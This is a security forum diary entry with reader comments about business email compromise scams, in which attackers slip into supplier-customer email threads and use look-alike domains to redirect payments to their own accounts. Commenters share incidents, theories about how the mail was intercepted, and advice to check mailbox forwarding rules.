A reader sent in details of a incident that is currently being investigated in their environment. (Thank you Peter for sharing! ) It appears to be a slick yet elaborate scam to divert a customer payment to the scammers. It occurs when the scammer attempts to slip into an email conversation and go undetected in order to channel an ordinary payment for service or goods into his own coffers. Here is a simple breakdown of the flow:
This scam was averted by the security consciousness business staff and properly analyzed by talented tech staff. We appreciate them sharing it with us. The flags that indicate this is elaborate, is the email appeared to be fully intercepted and targeted because of the mentioning of a payment was requested. Also, the fake domain that was created for this incident was created hours before the fraudulent email with the account information was sent. The technical analysis showed the fake domain email was sent from an IP not owned by the supplier or the customer. This incident is still under investigation and we will provide more obfuscated details as they become available. Please comment and discuss with us if this has happened to your environment and what was done to mitigate and investigate things further.
-Kevin
-- |
Kevin Shortt 85 Posts ISC Handler Jan 8th 2014 |
Thread locked Subscribe |
Jan 8th 2014 7 years ago |
This was a hijack of an INTERCEPTED legit email? I'd be *REALLY* interested to know how that was done w/o somehow sniffing the network.
|
Anonymous |
Quote |
Jan 8th 2014 7 years ago |
in some cases, the e-mails are "intercepted" by forwarding them to a third party (e.g. by adding forwarding rules to gmail accounts). This way, the attacker may learn enough about the pending transactions to craft a convincing email.
|
Johannes 4075 Posts ISC Handler |
Quote |
Jan 8th 2014 7 years ago |
This doesn't make any sense. The attacker intercept the email and alters it ("The Customer receives the email seemingly from the Supplier but altered by the Scammer with the following text slipped into it")... Why would the attacker then go through the trouble of registering a fake domain and sending a second email? The attacker could just insert the whole "scam text" right into the intercepted email. Further, if the attacker is in a position to intercept emails, it seems they would have plenty of access to launch much more sophisticated attacked.
|
Ryan 2 Posts |
Quote |
Jan 8th 2014 7 years ago |
Quoting Johannes:in some cases, the e-mails are "intercepted" by forwarding them to a third party (e.g. by adding forwarding rules to gmail accounts). This way, the attacker may learn enough about the pending transactions to craft a convincing email. If that was the case here, the attacker would not be able to be "altered by the Scammer with the following text slipped into it". |
Ryan 2 Posts |
Quote |
Jan 8th 2014 7 years ago |
Wouldn't an interception of this kind (prevention of receipt of original e-mail, complete replacement with altered e-mail) indicate a compromise of either the sender or recipient's e-mail servers? Seems to me that this is more than just eavesdropping and spamming an e-mail, otherwise they would have received two e-mails (one altered, one not).
Seems to me that they have bigger problems. |
Ryan 1 Posts |
Quote |
Jan 8th 2014 7 years ago |
Ryan...
Keep in mind that the investigation is still on going. There are various scenarios that can explain why the fake domain was created. The fake domain was to spoof the Supplier. Just because the email chain of the Customer is breached at some level, it does NOT mean full access to all systems is available to the attacker. A fake domain is an easy way for the attacker to get inserted into the communication (with ease), once the trust with the victim gets established. We are hoping others had some experience in a similar attack, so that any details shared could assist this incident and the general community. Thanks for all comments. It keeps the topic relevant. -Kevin |
Kevin Shortt 85 Posts ISC Handler |
Quote |
Jan 8th 2014 7 years ago |
Quoting Anonymous:<snip>... I would agree. As they continue to look into it, they are likely to find a breach some where. -Kevin |
Kevin Shortt 85 Posts ISC Handler |
Quote |
Jan 8th 2014 7 years ago |
Hello Kevin,
I have seen the very first version in the wild in August of 2013, it seems a new Nigerian 419 variant: All the details you have provided is similar to what i have dealt with 5+ cases in India. According to my Forensic Analysis and Incident Handling, here is the flow how it works: 1>Scammers somehow lure by sending Emails with phishing / Spear phishing links 2>They get their piece of keylogger installed on the PC's of the supplier/customer 3>They keep a tab on transactions like "shipping", "stuffment","vehicle number","Invoice","DHL Tracking"...etc 4>The scammers then create a fake email by registering a similar domain name with "TypoSquatting trick" which looks almost identical/similar, and goes un-noticed for a casual reader. 5>The newly created domain name lies as it is unused, however the FQDN is used for the creation of email id's which are later used for correspondence between the supplier/customer 6>Important key points are that, the TO,CC fields in the Email messages containing the legitimate email id's are also faked and are marked in this process 7>The Body of Email/ Message in the email is so poorly drafted in English, and with Capital letters which are normally not used, so the easy way to catch is to just check for semantic and grammar of the email content, "like every starting alphabet is capitalized". 8>The machines which were infected were managed by centralized AV monitoring tool, which could not detect this. 9>I myself have worked on 3 of these cases, and I have seen employers sacking their own trusted staff, because they were the only ones which dealt with financial trading information within their respective organizations. I will try to find some more facts from my cases and if possible i will try to provide more insight into it. we could not obtain a forensically sound image for the cases i handled, but because it was identified very late in December 2013 Another interesting point was, all three of the clients/cases had atleast either of the supplier or customer based at Nigeria/South Africa. All the concerned staff either at supplier or customer end was identified by name and similar fake email id's with their names were used for further chain of mail exchange. I cannot say for sure, if they had compromised majority of PC's or turned them into botnets. however,this is something almost a year old. Hope this helps someone. Regards, Nitin Kushwaha, CISSP JNCIA.ACA.ACSP.RHCSA.RHCE.CHFI.CEH.SCSECA.ITIL.CIW-SA. CIW-SP.CCP.CLOUDU.CCSA.CCWA.CCLA.CCHA.MCSE.MCSA.MCS.MCP |
Kevin Shortt 1 Posts |
Quote |
Jan 8th 2014 7 years ago |
This is far simpler than you think.
What took place is an intercept of the outgoing messages from the source, not the customer. The batch was copied off from the server by changing the spool directory so it never sends, then used with the new domain from the phishing server or in some cases the actual server that was compromised using standard find and replace UNIX tools. Sadly, a child can do this. |
Al of Your Data Center 80 Posts |
Quote |
Jan 9th 2014 7 years ago |
Hi
I am from a Web company from Malaysia designing and hosting (using third party services, i.e Hostgator and our local provider) for manufacturers. Recently we are getting complains exactly like the nature of this thread and I couldn't find any information on email interception. Scenario 1 : 1) Our client (Seller) send email to its customer yahoo mail(Buyer) with prices 2) Buyer send back acknowledge email to Seller 3) Buyer then receive an email from Seller with an attached PDF invoice, WHICH THE BANKING DETAILS HAS BEEN ALTERED to some China bank account. 4) The email header clearly shows it is being spoof and it is NOT from the original sender server 5) The "reply to email" field still shows the the Seller email address. Scenario 2 : 1) Another client (Seller) send email to its customer gmail (Buyer) 2) Along the line, Seller stop receiving replies from Buyer 3) Call up Buyer, Buyer said he is still responding to Seller email (WHICH THE SCAMMER HAVE TOOK OVER!) 4) Seller logs into this webmail (he usually uses outlook) to find a newly added Filtering rule to automatically move the Buyer email to Trash. Scenario 3 : 1) When Seller forward an to email another account, some random message from China got attached to the email. We checked with the local email provider and the normal response are spyware, password is not strong, someone internal hacked in. As a web company with a few clients facing the same issue, we do not believe it is some internal job but sophisticated interception is going on and I believe a lot companies are facing this problem. Can someone please point me to some websites with technical explanation on this? I need to answer our clients. Thanks |
Al of Your Data Center 1 Posts |
Quote |
Jun 27th 2014 6 years ago |
Our company has been the victim of this type of fraud just this week.
I found this ongoing discussion to be exactly what we are facing. Their modified phishy email asking for money to be sent to their bank account is almost identically worded. My questions are: 1) any update and conclusion and resolution of your investigations you can share? 2) how do I get their bogus spoofed website pulled? 3) any insight how the email was intercepted? Other than changing passwords I'm at a loss of where the problem occurred. |
Al of Your Data Center 1 Posts |
Quote |
Apr 30th 2015 5 years ago |
This scam is still ongoing, just happened to a friend of mine and it cost him $11k in funds he sent to a fraudulent account.
Coincidentally, the wording of the scam message included the words "under audit". (A native English speaking person would probably say "being audited") We are now checking to see if someone in the email chain has a compromised email account, with BCC rules setup etc. |
Al of Your Data Center 1 Posts |
Quote |
Aug 24th 2015 5 years ago |
A similar incident happened to us, we are in an argument with our supplier as an email was intercepted, altered, ie bank details altered, and we paid into a bogus bank account, we were aware they were setting up a new bank account, and confirmed this with them in a reply, which also went to the bogus email address. Our question is, whose email was intercepted?
The supplier sent it to 2 independent emails, one was altered, and was received, the other one which had been "cc" in we later found out had bounce back to the original sender and had been altered. Is there anyway we can find out the who's email was hacked. |
Al of Your Data Center 1 Posts |
Quote |
Nov 21st 2015 5 years ago |
I came across the same type of scam very recently. One party was based in India and the other supplier in China. Somehow the scammer came into the two parties' conversation. He then created a similar domain but on v90.us and changed the bank account details. The bank account was located in Poland. Unfortunately, our client wasn't much security conscious and paid about $20k to the bogus account.
-- Anirudh R |
AnirudhR 2 Posts |
Quote |
Nov 23rd 2015 5 years ago |
Is there any way to find out what is compromised? The email server or the user's PC or what?? We have been targeted by this type of scam 3 times in the last 4-5 months. Twice of which took place within the last week itself.
|
AnirudhR 1 Posts |
Quote |
Feb 26th 2016 5 years ago |
+1
|
AnirudhR 1 Posts |
Quote |
Mar 8th 2016 4 years ago |
Hey all,
I know this thread is several years old, but I feel it worthwhile to add a compromised situation that I recently encountered. (This thread actually helped secure the email accounts again.) If you encounter persistent email hijacking or intercepted emails, ** make sure your email auto-forwarding settings are not compromised **. This would apply to the recipients' accounts as well. What happened to us... One of our email accounts was compromised via a successful phishing attempt. We use G Suite / Gmail for our company mail. The scammer set up mail forwarding on the hacked account, so they had a copy of all correspondence sent to that account. Changing the password on the account (which we did immediately) did nothing, since the forwarding was still in place. Very simple hack, and I spent hours on it until I finally encountered this thread. Details: 1. We received a request to wire money. This by itself wasn't suspect, as we normally do business via wire payments with our overseas suppliers. 2. They quoted previous emails in the reply. Slipstreamed! This made it seem even more legit. 3. They copied all the details of the email recipient list, formatting and all. 4. The scammer used domain names that were very close to our suppliers'. It was off by 1 letter. 5. Sender email was forged; it was the legit email address. But when you hit Reply, it would use the fake domain (set in the reply-to field, not visible in Gmail unless you View Original, or actually hit Reply and inspect the email you're replying to). We almost wired $40,000 the first time. Actually, the wire was submitted but we were able to cancel it after we realized what happened. The second time, several months later (after changing passwords but not checking the forwarding), it was for a different supplier, but using the exact same tactic. Replies inline with details copied, asking for the wire transfer. Good luck to all, hope this info helps. - Sushi |
Anonymous |
Quote |
Jul 18th 2017 3 years ago |
Sign Up for Free or Log In to start participating in the conversation!